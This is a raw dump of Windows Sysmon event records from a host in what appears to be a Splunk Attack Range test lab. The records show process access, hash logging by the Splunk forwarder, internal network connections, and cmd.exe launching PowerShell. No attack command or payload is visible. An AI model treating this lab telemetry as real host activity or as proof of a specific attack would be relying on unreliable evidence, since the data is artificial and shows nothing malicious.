13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:39.166{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.161{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:40.596{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2116FAFA0F79D6A63520AC115165EA40,SHA256=59C03BCD3BBD592D26D8ED76AF47E66425E386F200C0FF1D4D4C4FBF4CC08281,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:40.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F343B174F2A7150354AE87BC1E8240B,SHA256=C04FECCDC1193E51A5216C044202FD88F0078E83FE66298B45ECE53C271E1ABA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:41.626{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=827A492134BADCF4DA12C41A7DCED24F,SHA256=5D8B23957EC07D2C88481C2F623B80E8029BDA9BC036DBED32039835F2241F47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:42.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3543B672D63DFD0FE4AF76DCFB7BEAE,SHA256=AB7C8745613C030B1794C4E36E3A3A72FCC217188A1B9C01D07DEFFCA4477F44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:43.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CA56866389326C5003D3691468EB33A3,SHA256=CCFF8F1B901F5A29842895BDA9BE5629EFF5D4A457AD328F5D52F314102D2D3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:43.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E05E63E76A8E675F6CFF75C97AC09EFD,SHA256=49554B4BB98CBC18EE687383E811ABE90161EFE2E14A6A0B3E69B582C1E78FA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036498127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:44.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2721DCB13593548CDF1277AE4ABA88D5,SHA256=06D31526F9D88D9698BD509606CD4A126DB8FDE974388D1B0D806389A40F54C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:14.580{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50614-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:45.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E6430BCE953B476FBA479801295D789,SHA256=8C79E0BF9A12EF83DC5CBCFC63A4944979119901861A70F3EB781ECDD4794AEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:14.764{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50615-false10.0.1.12-8000- 23542300x800000000000000036498130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:46.806{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21382FE8DBD50C3B39DF036EBD659B3C,SHA256=3330785047480D98643589241D40F3EEF987AEBE11E58908568821DF35A95AE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.977{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.937{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-A1AF-6140-9F56-04000000C801}61802616C:\Windows\system32\cmd.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.934{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe 
reed_schmidtC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe reed_schmidt 10341000x800000000000000036498139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:47.921{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\Sy
stem.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036498132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.926{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe 
